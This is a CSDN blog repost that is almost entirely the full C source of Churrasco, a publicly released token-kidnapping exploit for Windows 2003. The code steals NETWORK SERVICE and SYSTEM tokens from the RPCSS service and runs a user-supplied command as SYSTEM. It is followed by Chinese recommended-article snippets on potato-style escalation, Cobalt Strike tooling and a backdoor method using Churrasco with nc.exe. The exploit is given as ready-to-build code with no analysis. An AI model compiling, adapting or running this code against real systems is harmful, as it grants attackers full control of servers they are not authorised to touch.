SeImpersonatePrivilege

最新推荐文章于 2023-08-11 13:30:00 发布
最新推荐文章于 2023-08-11 13:30:00 发布
阅读量1.7k 收藏
点赞数
始于C#,精于C&C++,醉心于Windows内核与Com组件安全研究
本文链接:https://blog.csdn.net/oshuangyue12/article/details/78580329
版权 
//  Argeniss - Information Security - www.argeniss.com

//	**Churrasco**

//	Elevation of privileges PoC exploit for Token Kidnapping on Windows 2003
//  http://www.argeniss.com/research/TokenKidnapping.pdf

//  Author: Cesar Cerrudo

//	Needs impersonation and assign primary token rights in order to work, by default NETWORK SERVICE and LOCAL SERVICE accounts have these rights
//  Works fine in SQL Server running under any Windows account.
//	Works fine in IIS only when ASP .NET Application Pool is running under NETWORK SERVICE or LOCAL SERVICE accounts, it needs some minor modifications to 
//	work on an Application Pool running under a regular user account since this kind of account will be able to impersonate but wonn't have assign primary token right by default

// Netstat code taken from http://www.codeguru.com/forum/archive/index.php/t-188092.html by ashotog


#include "stdafx.h"


BOOL InvokeMSDTC(){
//IIRC this code was taken from MSDN
	ITransactionDispenser * pTransactionDispenser;
	ITransaction * pTransaction;
	HRESULT hr = S_OK ;
 
	// Obtain a transaction dispenser interface pointer from the DTC.
	DtcGetTransactionManagerEx(NULL,NULL,IID_ITransactionDispenser,0,0, (void **)&pTransactionDispenser);
	if (FAILED (hr)) {
		printf("/currasco/-->MSDTC service seems to have problems\n");
		return (0);
	}

	pTransactionDispenser->BeginTransaction( NULL,ISOLATIONLEVEL_ISOLATED, ISOFLAG_RETAIN_DONTCARE, NULL, &pTransaction ) ; 

	return 1;
}


typedef struct _MIB_TCPROW_EX
{
DWORD dwState; // MIB_TCP_STATE_*
DWORD dwLocalAddr;
DWORD dwLocalPort;
DWORD dwRemoteAddr;
DWORD dwRemotePort;
DWORD dwProcessId;
} MIB_TCPROW_EX, *PMIB_TCPROW_EX;

typedef struct _MIB_TCPTABLE_EX
{
DWORD dwNumEntries;
MIB_TCPROW_EX table[ANY_SIZE];
} MIB_TCPTABLE_EX, *PMIB_TCPTABLE_EX;

typedef struct _MIB_UDPROW_EX
{
DWORD dwLocalAddr;
DWORD dwLocalPort;
DWORD dwProcessId;
} MIB_UDPROW_EX, *PMIB_UDPROW_EX;

typedef struct _MIB_UDPTABLE_EX
{
DWORD dwNumEntries;
MIB_UDPROW_EX table[ANY_SIZE];
} MIB_UDPTABLE_EX, *PMIB_UDPTABLE_EX;


typedef DWORD (WINAPI *PROCALLOCATEANDGETTCPEXTABLEFROMSTACK)(PMIB_TCPTABLE_EX*,BOOL,HANDLE,DWORD,DWORD);
PROCALLOCATEANDGETTCPEXTABLEFROMSTACK lpfnAllocateAndGetTcpExTableFromStack = NULL;

BOOL LoadExIpHelperProcedures(void)
{
	HMODULE hModule;

	hModule = LoadLibrary(_T("iphlpapi.dll"));
	if (hModule == NULL)
		return FALSE;

	// XP and later
	lpfnAllocateAndGetTcpExTableFromStack = (PROCALLOCATEANDGETTCPEXTABLEFROMSTACK)GetProcAddress(hModule,"AllocateAndGetTcpExTableFromStack");
	if (lpfnAllocateAndGetTcpExTableFromStack == NULL)
		return FALSE;

	return TRUE;
}

BOOL IsImpersonationToken (HANDLE hToken, CHAR * cType)
{
	DWORD							ReturnLength;
	SECURITY_IMPERSONATION_LEVEL	TokenImpInfo;
	TOKEN_TYPE						TokenTypeInfo;

	if(GetTokenInformation(hToken, TokenType,  &TokenTypeInfo, sizeof(TokenTypeInfo), &ReturnLength)){
		if (TokenTypeInfo==TokenImpersonation) {
			if((GetTokenInformation(hToken, TokenImpersonationLevel,  &TokenImpInfo, sizeof(TokenImpInfo), &ReturnLength)&& TokenImpInfo==SecurityImpersonation)){
				if (cType) *cType='I';
				return TRUE;
			}
        }
		else { 
			if (cType) *cType='P'; //it's a primary token, TokenTypeInfo==TokenPrimary
			return TRUE; 
		}
	}

	return FALSE;
}

DWORD RunCommandAsSystem(HANDLE hToken, LPSTR lpCommand)
{
	HANDLE				hToken2,hTokenTmp;
	PROCESS_INFORMATION pInfo;
	STARTUPINFO         sInfo;
	DWORD				dwRes;
	CHAR				cType;
	LPTSTR				lpComspec;
	LPSTR				lpCommandTmp;


    ZeroMemory(&sInfo, sizeof(STARTUPINFO));
    ZeroMemory(&pInfo, sizeof(PROCESS_INFORMATION));
    sInfo.cb= sizeof(STARTUPINFO);
    sInfo.lpDesktop= "WinSta0\\Default"; 
 
	IsImpersonationToken(hToken, &cType);

	if (cType=='I'){
		SetThreadToken(NULL, hToken);
		OpenThreadToken(GetCurrentThread(),TOKEN_ALL_ACCESS,FALSE,&hTokenTmp);
		SetThreadToken(NULL, NULL);
	}
	else 
		hTokenTmp=hToken;

	DuplicateTokenEx(hTokenTmp,MAXIMUM_ALLOWED,NULL,SecurityImpersonation, TokenPrimary,&hToken2) ;

	lpComspec= (LPTSTR) malloc(1024*sizeof(TCHAR));
	GetEnvironmentVariable("comspec",lpComspec,1024);

	lpCommandTmp= (LPSTR) malloc(1024*sizeof(CHAR));

	strcpy(lpCommandTmp, "/c  ");
	strncat(lpCommandTmp, lpCommand, 500);
	
	dwRes=CreateProcessAsUser(hToken2, lpComspec, lpCommandTmp, NULL, NULL, TRUE, NULL, NULL, NULL, &sInfo, &pInfo);
	
	if (hTokenTmp!=hToken)
		CloseHandle(hTokenTmp);

	CloseHandle(hToken2);

	return dwRes;


}


DWORD GetRpcssPid(void)
{
	DWORD dwLastError, dwPort, dwSize, dwPid=0;
	PMIB_TCPTABLE_EX lpBuffer = NULL;
	PMIB_UDPTABLE_EX lpBuffer1 = NULL;

	if (!LoadExIpHelperProcedures())
		return 0;

	dwLastError = lpfnAllocateAndGetTcpExTableFromStack(&lpBuffer,TRUE,GetProcessHeap(),0,2);
	if (dwLastError == NO_ERROR)
	{
		for (dwSize = 0; dwSize < lpBuffer->dwNumEntries; dwSize++)
		{
			dwPort=((lpBuffer->table[dwSize].dwLocalPort & 0xFF00) >> 8) + ((lpBuffer->table[dwSize].dwLocalPort & 0x00FF) << 8);
			
			if (dwPort==135 && lpBuffer->table[dwSize].dwState == 2)
			{
				dwPid = lpBuffer->table[dwSize].dwProcessId ;
				break;
			}
		}
	}

	if (lpBuffer)
		HeapFree(GetProcessHeap(),0,lpBuffer);

	return dwPid;
}




BOOL GetTokenUser(HANDLE hToken, LPTSTR lpUserName)
{
	DWORD			dwBufferSize = 0;
	SID_NAME_USE	SidNameUse;
	TCHAR			DomainName[MAX_PATH];
	DWORD			dwUserNameSize= MAX_PATH * 2 ;
	DWORD			dwDomainNameSize = MAX_PATH * 2;
	PTOKEN_USER		pTokenUser;

	GetTokenInformation(hToken, TokenUser, NULL,0,&dwBufferSize);
	
	pTokenUser = (PTOKEN_USER) new BYTE[dwBufferSize];
	memset(pTokenUser, 0, dwBufferSize);

	if (GetTokenInformation(hToken, TokenUser, pTokenUser, dwBufferSize, &dwBufferSize)){
		if (LookupAccountSid(NULL,pTokenUser->User.Sid,lpUserName,&dwUserNameSize,DomainName,&dwDomainNameSize,&SidNameUse)){
			return TRUE;
		}
	}
	
	return FALSE;
}




HANDLE GetSystemToken(HANDLE hToken,DWORD Pid){
	HANDLE		hTgtHandle=0;
	TCHAR		UserName[MAX_PATH];
	HANDLE		hProcess;
	
	SetThreadToken(NULL,hToken);

	hProcess=OpenProcess(PROCESS_DUP_HANDLE,NULL,Pid);
	
	SetThreadToken(NULL,NULL);	

	if (hProcess) {	
		//Brute force token handles
		for (DWORD hSrcHandle=4;hSrcHandle<0xffff;hSrcHandle+=4){
			if(DuplicateHandle(hProcess,(HANDLE)hSrcHandle,GetCurrentProcess(),&hTgtHandle,0,FALSE,DUPLICATE_SAME_ACCESS ))	{	
				if (IsImpersonationToken(hTgtHandle, NULL)){
					if (GetTokenUser(hTgtHandle,UserName)){
						if (!strcmp(UserName,"SYSTEM")){
							printf ("/churrasco/-->Found SYSTEM token 0x%x\n",hTgtHandle);
							return hTgtHandle;
						}
						else
							printf ("/churrasco/-->Found %s Token\n", UserName);
					}
				}
				CloseHandle(hTgtHandle);
			}
		}
		CloseHandle(hProcess);
	}
	else {
		printf ("/churrasco/-->Couldn't open Rpcss process\n");
		return 0;
	}

	return 0;

}
//need to improve this!!!!
HANDLE GetNetServToken(){
	HANDLE		hToken;
	TCHAR		UserName[MAX_PATH];

	for (DWORD j=0x4;j<=0xffff;j+=4){
		hToken=(HANDLE)j;
		if (IsImpersonationToken(hToken, NULL) ){
			if(GetTokenUser(hToken, UserName)){
				if (!strcmp(UserName,"NETWORK SERVICE")){
					printf ("/churrasco/-->Found NETWORK SERVICE token 0x%x\n",hToken);
					return hToken;
				}
				else 
					printf ("/churrasco/-->Found %s Token\n",UserName);
			}
		}
	}
	return 0;
}


int _tmain(int argc, _TCHAR* argv[])
{
	DWORD	dwRpcssPid;
	TCHAR	UserName[MAX_PATH];
	DWORD	dwCharCount = MAX_PATH;
	LPSTR	lpCommand;
	HANDLE	hToken, hSysToken, hNetServToken=0;

	if (argc != 2) {
		printf ("/churrasco/-->Usage: Churrasco.exe \"command to run\"\n");
		return 0;
	}
	
	lpCommand= argv[1];
	
	if(GetUserName(UserName, &dwCharCount)){
		printf ("/churrasco/-->Current User: %s \n",UserName);
		if (strcmp(UserName,"NETWORK SERVICE")){
			printf ("/churrasco/-->Process is not running under NETWORK SERVICE account!\n");
			printf ("/churrasco/-->Getting NETWORK SERVICE token ...\n");
			
			//Call MSDTC to end up getting NETWORK SERVICE token in our process
			InvokeMSDTC();

			//Get NETWORK SERVICE impersonation token
			hNetServToken=GetNetServToken();
			if (hNetServToken==0){
				printf ("/churrasco/-->Couldn't find NETWORK SERVICE token\n");
				return 0;
			}
		}
	}
	else {
		printf ("/churrasco/-->Couldn't get current user name\n");
		return 0;

	}
	
	//Get RPCSS PID
	printf ("/churrasco/-->Getting Rpcss PID ...\n");
	dwRpcssPid=GetRpcssPid();
	
	//Set NETWORK SERVICE token as current thread token so we can open RPCSS threads
	SetThreadToken(NULL,hNetServToken);

	if (dwRpcssPid){
		printf ("/churrasco/-->Found Rpcss PID: %d \n",dwRpcssPid);

        //Brute force threads id, I'm lazy to use native APIs, this works the same
		printf ("/churrasco/-->Searching for Rpcss threads ...\n");
		for (DWORD Tid=0;Tid < 0xffff ;Tid+=4) {
			HANDLE hThread=OpenThread(THREAD_ALL_ACCESS,TRUE,Tid);
			
			if (hThread && dwRpcssPid==GetProcessIdOfThread(hThread)) { 
				printf ("/churrasco/-->Found Thread: %d \n",Tid);
				
				//Make thread impersonate Rpcss service account
				QueueUserAPC((PAPCFUNC)ImpersonateSelf,hThread,0x2 );

				Sleep(500);
				
				//If RPCSS thread is impersonating then we can get RPCSS process token
				if (OpenThreadToken(hThread,TOKEN_ALL_ACCESS,FALSE,&hToken)){
					printf ("/churrasco/-->Thread impersonating, got NETWORK SERVICE Token: 0x%x\n",hToken);
					printf ("/churrasco/-->Getting SYSTEM token from Rpcss Service...\n");
					
					//Get SYSTEM token from RPCSS service
					hSysToken=GetSystemToken(hToken,dwRpcssPid);
					if (hSysToken){
						printf ("/churrasco/-->Running command with SYSTEM Token...\n");
						if (RunCommandAsSystem(hSysToken, lpCommand)){
							printf ("/churrasco/-->Done, command should have ran as SYSTEM!\n");
							break;
						}
						else {
							printf ("/churrasco/-->Couldn't run command, try again!\n");
							return 0;
						}
					}
				}
				printf ("/churrasco/-->Thread not impersonating, looking for another thread...\n");
							
			}
			CloseHandle(hThread);
		}
	}
	else {
		printf ("/churrasco/-->Couldn't find Rpcss PID!\n");
	}
	return 0;
}

王cb
关注
SeImpersonatePrivilege权限提权(Server 2019)
墨痕诉清风的博客
04-23 1177
SeImpersonatePrivilege权限提权
权限提升之利用相关服务提权(烂土豆系列).pdf
10-21
首先,需要了解的前提是拥有SeImpersonatePrivilege或SeAssignPrimaryTokenPrivilege权限。拥有这些权限的用户可以使用Potato提权来获取SYSTEM权限。具体来说,本地管理员账户和服务账户都可以使用这种方法来获取...
Windows 权限提升:SeImpersonatePrivilege
最新发布
qq_44005305的博客
08-11 231
谈到SeImpersonatePrivilege(身份验证后模拟客户端),它是在Windows 2000 SP4中引入的。被分配此权限的用户是设备本地管理员组的成员和设备的本地服务帐户。除了这些用户和组之外,以下组件也具有此用户权限: 由服务控制管理器组件对象模型(COM) 服务器启动的服务由 COM 基础结构启动并配置为在特定帐户下运行现在我们知道哪些类型的用户拥有此特权,是时候了解用户使用这些特权获得什么了。每当为用户分配 SeImpersontatePrivilege
精选_突破Session0隔离在系统服务程序中创建用户桌面进程_源码打包
03-10
- **权限问题**:服务需要有足够的权限来模拟用户,通常需要`SeAssignPrimaryTokenPrivilege`和`SeImpersonatePrivilege`权限。这些可以通过调整服务的权限设置或在创建服务时指定。 - **桌面和窗口站**:在Session...
spoolsystem:打印后台处理程序被命名为“模拟钴”的管道模拟
03-21
线轴系统 SpoolSystem是Cobalt Strike...两种模式都允许仅具有SeImpersonatePrivilege的用户在当前信标会话中获得SYSTEM特权。如果您具有的权限提升可以为您提供LOCAL SERVICE , NETWORK SERVICE或类似NETWORK SERVIC
利用CVE-2021-21551的SYSTEM-C/C++开发
05-27
针对CVE-2021-21551的系统漏洞利用CVE-2021-21551针对SVE-2021-21551的系统漏洞攻击使用SeImpersonatePrivilege的SpoolPrinter Privesc得益于@_ForrestOrr ... NtQuerySystemInformation来自@Void_Sec ... 在thi
此计算机必须为委派而被信任_WCF 的委派和模拟
weixin_42508215的博客
12-24 382
WCF 的委派和模拟Delegation and Impersonation with WCF03/30/2017本文内容模拟 是一种常用技术,服务可使用该技术限制客户端对服务域资源的访问。Impersonation is a common technique that services use to restrict client access to a service domain's res...
linux权限数字‘755’,‘700’等代表的含义
WILDCHAP_的博客
09-28 7043
444 r–r--r– 600 rw------- 644 rw-r–r-- 666 rw-rw-rw- 700 rwx------ 744 rwxr–r-- 755 rwxr-xr-x 777 rwxrwxrwx 从左至右, 1-3位数字代表文件所有者的权限, 4-6位数字代表同组用户的权限, 7-9数字代表其他用户的权限。 读取权限:等于4 用 r 表示 写入权限:等于2 用 w 表示 执行权限:等于1 用 x 表示 例如: 755 7: 4+2+1 rwx 所有者具有读取、写入、执行.
go开发报 A required privilege is not held by the client 错误
zy332719794的专栏
04-06 3966
这种问题一般是go的程序包括第三方包程序对文件访问的权限不足引起。 这是打开操作系统开发者模式即可。且在真实运行环境如Linux上是不会有问题的。 打开操作系统开发者模式方法: 操作系统 -> win -> 设置-> 开发者选项 -> 开启“开发人员模式” ...
SHIFT后门拿服务器之方法总结
weixin_34006965的博客
03-11 250
提权工具如下:cmd.exe Churrasco.exe nc.exe 提权前提:Wscript组件成功开启 如果Wscript组件被关闭,则使用以下方法开启: 源代码: &lt;object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"&gt;&lt;/...
MS Windows SeImpersonatePrivilege权限提升漏洞
weixin_33938733的博客
07-16 1085
受影响系统:Microsoft Windows XP SP2Microsoft Windows Vista SP1Microsoft Windows Vista Microsoft Windows Server 2008Microsoft Windows Server 2003 SP2Microsoft Windows Server 2003 SP1描述:Windows是微软发布的非常流行的操作系...
Windows普通程序与服务程序的初始特权(Privileges)
Joal_zhu的专栏
04-26 6023
最近在学习写Windows服务程序,发现Windows普通程序与服务程序的初始特权很不一样,很想记录下来: 特权 交互服务 (System帐号) 非交互服务 (System帐号) 服务 (Administrator) 普通程序 (Administrator) SeAssignPrimaryTokenPrivilege Disnabled Disn
hackthebox - Tally (考点:sharepoint & ftp & keepass & smb & sqsh & SeImpersonatePrivilege
冬萍子癸水
05-12 1310
1 扫描 21想到ftp进去找文件,139 445想到smb进去找文件,但都进不去。80进web搜集信息。看到是sharepoint页面。或者在nmap扫描也可看到32844端口开着。这也是sharepoint的一个默认端口 2 sharepoint枚举 sharepoint的文件太多,枚举也是个很麻烦的事。。 可以用这个sharepoint枚举工具 C:\root\exp\SharePointURLBrute v1.1 - 18MAR2012> perl SharePointURLBrute\
juicy-potato Windows提权之访问令牌操纵
weixin_45682070的博客
08-02 1438
0x01 环境攻击机:Kali受害机:Windows 2008R20x02 利用过程一、juicy-potato条件限制:需要支持SeImpersonate或者SeAssignPrimaryToken权限(通常情况下IIS、MSSQL具有这两个权限)开启DCOM本地支持RPC或者远程服务器支持PRC并能成功登录能够找到可用的COM对象获取权限后,使用whoami /priv查看具有的token权限2. 使用Empire生成反弹shell的payload3. 通过冰蝎上传4. 运行c:\temp\JuicyP
windows之 访问控制模型
点点灵犀
06-10 2249
当一个线程使用Open*打开一个内核对象时,会发生什么? 有两种可能: 1. 打开成功,拿到句柄 2. 打开失败 这不是废话么?!为啥打开失败呢?有两种可能: 1. 当前线程不具有指定的特权 2.  权限不足(由dwDesiredAccess参数指定权限) 这个时候就引入了今天的主题:令牌(包含特权列表)和安全描述符(描述用户权限)。 Token token是什么?对
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值